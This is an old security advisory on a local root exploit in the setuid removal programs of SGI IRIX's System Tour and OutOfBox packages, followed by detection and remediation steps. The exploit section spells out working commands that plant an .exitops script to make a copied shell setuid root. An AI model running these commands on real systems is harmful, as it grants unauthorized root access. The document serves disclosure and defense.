Systour and OutOfBox


    IRIX 5.x, 6.0.x, 6.1, 6.2 and 6.3


    The  Silicon  Graphics  Indigo  Magic  System  Tour  and  OutOfBox
    Experience packages are factory installed on all Silicon  Graphics
    Indy systems.  The following text is Yuri Volobuev's credit.

    The purpose of  these two packages,  systour and OutOfBox,  are to
    demonstrate and  highlight the  features and  capabilities of  the
    user environment and system.

    Due  to  the  disk  space  requirements  of these subsystems, most
    sites will remove these  subsystems for disk space  reclamation as
    part of initial  system setup.   Those sites which  have done this
    will not be vulnerable.

    On those systems that the subsystems are still installed on,  both
    subsystems provide  background setuid  root programs  to perform a
    subsystem  removal  when  a  user  decides to remove the software.
    This  removal  is  done  using  the  standard  IRIX /usr/sbin/inst
    program that manages IRIX software.

    Provided with  the right  environment, the  inst program  could be
    manipulated to execute arbitrary commands with root privileges.

    An  account  on  the  vulnerable  system  is required for exploit.
    With an  account, these  vulnerabilities are  exploitable by  both
    local and remote access.  And here comes the exploit.

    First, we set  up an environment  for running inst.  dryrun is set
    to true because we are considerate environmentalists.

        $ rbase=$HOME; export rbase
        $ mkdir -p $HOME/var/inst
        $ echo "dryrun: true" > $HOME/.swmgrrc

    These three lines should be very familiar to all exploitors.

        $ cp -p /bin/sh /tmp/foobar
        $ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
        $ chmod a+x $HOME/var/inst/.exitops

    Now run it.

        $ /usr/lib/tour/bin/RemoveSystemTour
        Executing outstanding exit-commands from previous session ..
        Successfully completed exit-commands from previous session.
        Reading installation history
        Checking dependencies
        ERROR : Software  Manager: automatic installation  failed: New
        target (nothing installed) and no distribution.


    There  are  no  patches  for  these  issues.   However,  using the
    information below steps can be taken to eliminate the exposure.

    To determine if the OutOfBox and systour subsystems are  installed
    on a particular system, the following command can be used:

        % versions OutOfBox.sw systour.sw
        I = Installed, R = Removed

           Name                 Date      Description

        I  OutOfBox             11/05/96  OutOfBox Experience, 1.1
        I  OutOfBox.sw          11/05/96  OutOfBox Experience Software, 1.1
        I  OutOfBox.sw.complete 11/05/96  Complete OutOfBox Experience
        I  OutOfBox.sw.intro    11/05/96  OutOfBox Intro Movies

        I  systour              02/12/96  Indigo Magic System Tour, 5.2
        I  systour.sw           02/12/96  System Tour Execution Environment
        I  systour.sw.eoe       02/12/96  System Tour Execution Environment

    In the  above case,  the subsystems  of concern  are installed and
    the steps below should be performed.  If no output is returned  by
    the  command,  the  subsystems  are  not  installed and no further
    action is required.

    *** IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2 ***

    The steps below can be used to remove the vulnerability by  either
    changing the program permissions (use step 2a) or by removing  the
    subsystems (use step 2b).

     1) Become the root user on the system.

                % /bin/su -

     2) Choose either step 2a or 2b depending on which has the desired

     2a) Change  the  setuid  root  permissions  on  the  programs  of

                # /bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
                # /bin/chmod u-s /usr/people/tour/oob/bin/oobversions

    Removing  the  setuid  root  permissions  from  these  tools  will
    prevent non-root users from  removing the subsystems.   Removal of
    the subsystems will  only be possible  if the systour  or OutOfBox
    user is a root user or  if the inst IRIX software manager  is used
    by root for removal.

      2b) Remove the vulnerable subsystems.

                # /usr/sbin/versions -v remove systour OutOfBox

     4) Return to previous level.

                # exit

    *** IRIX 6.3 ***

    The IRIX  operating system  version 6.3  does not  have the System
    Tour subsystem but does have the OutOfBox Experience subsystem.

    The steps below can be used to remove the vulnerability by  either
    changing the program permissions (use step 2a) or by removing  the
    subsystems (use step 2b).

     1) Become the root user on the system.

                % /bin/su -

     2) Choose either step 2a or 2b depending on which has the desired

     2a) Change the setuid root permissions on the program of concern.

                # /bin/chmod u-s /usr/people/tour/oob/bin/oobversions

    Removing  the  setuid  root  permissions  from  this  program will
    prevent non-root users  from removing the  subsystem.  Removal  of
    the subsystem  will only  be possible  if the  OutOfBox user  is a
    root user or  if the inst  IRIX software manager  is used by  root
    for removal.

      2b) Remove the vulnerable subsystem.

                # /usr/sbin/versions -v remove OutOfBox

     4) Return to previous level.

                # exit